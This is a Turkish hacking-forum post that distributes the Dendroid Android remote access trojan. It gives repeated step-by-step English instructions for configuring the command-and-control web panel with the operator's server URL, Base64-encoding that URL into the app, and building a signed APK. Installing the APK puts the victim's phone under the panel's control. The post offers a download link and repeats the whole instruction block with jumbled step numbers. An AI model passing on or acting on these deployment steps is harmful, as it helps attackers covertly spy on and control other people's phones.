redkit
Prof Spys-z
- Katılım
- 22 Nis 2013
- Mesajlar
- 880
- Tepkime puanı
- 3
- Puanları
- 0
DENDROID - HTTP ANDROID RAT

Dendroid Web Panel.
1) Extract the dendroid source. And Navigate to the Dendroid Panel Folder. Inside will be two Folders, Navigate inside Panel, You'll see multiple PHP files.
2) Open reg.php, applysettings.php, blockbot.php ,deletebot.php ,deletefile.php ,deletepics.php ,functions.php, table.php In your text editor of your choice
3) With the multiple php files open you will see { $url = "http://pizzachip.com/rat/"; } You will need to replace this in all the files you just opened with the url to your server
For an example > http://mysite.com/Panel/
Below Image Is Inside Reg.php ONLY
4) Open clearawaiting.php, clearmessages.php in your text editor. Add Then click MyService To Open it.
4) Once MyService is open you ill see encodedURL = , backupURL = , encodedPassword = , Go to Base64encode.org and encode your url you used in Step 3 Of Dendroid Web Panel. And the same for backupURL unless you have two Panels. For an example http://mysite.com/Panel Open Module Settings > Select "Use module comple path.." > Then select a valid compile directory.
7) then Click Build > Generate Signed Apk > Select Dendroid > Next > Proceed to make the keystore.
8) Select the destination for the apk output and name. Then Click Finish.
9) Install the APK and the user will pop up in the control panel.

İNDİRMEK İÇİN TIKLAYINIZ

Dendroid Web Panel.
1) Extract the dendroid source. And Navigate to the Dendroid Panel Folder. Inside will be two Folders, Navigate inside Panel, You'll see multiple PHP files.
2) Open reg.php, applysettings.php, blockbot.php ,deletebot.php ,deletefile.php ,deletepics.php ,functions.php, table.php In your text editor of your choice
3) With the multiple php files open you will see { $url = "http://pizzachip.com/rat/"; } You will need to replace this in all the files you just opened with the url to your server
For an example > http://mysite.com/Panel/
Below Image Is Inside Reg.php ONLY
4) Open clearawaiting.php, clearmessages.php in your text editor. Add Then click MyService To Open it.
4) Once MyService is open you ill see encodedURL = , backupURL = , encodedPassword = , Go to Base64encode.org and encode your url you used in Step 3 Of Dendroid Web Panel. And the same for backupURL unless you have two Panels. For an example http://mysite.com/Panel Open Module Settings > Select "Use module comple path.." > Then select a valid compile directory.
7) then Click Build > Generate Signed Apk > Select Dendroid > Next > Proceed to make the keystore.
8) Select the destination for the apk output and name. Then Click Finish.
9) Install the APK and the user will pop up in the control panel.

İNDİRMEK İÇİN TIKLAYINIZ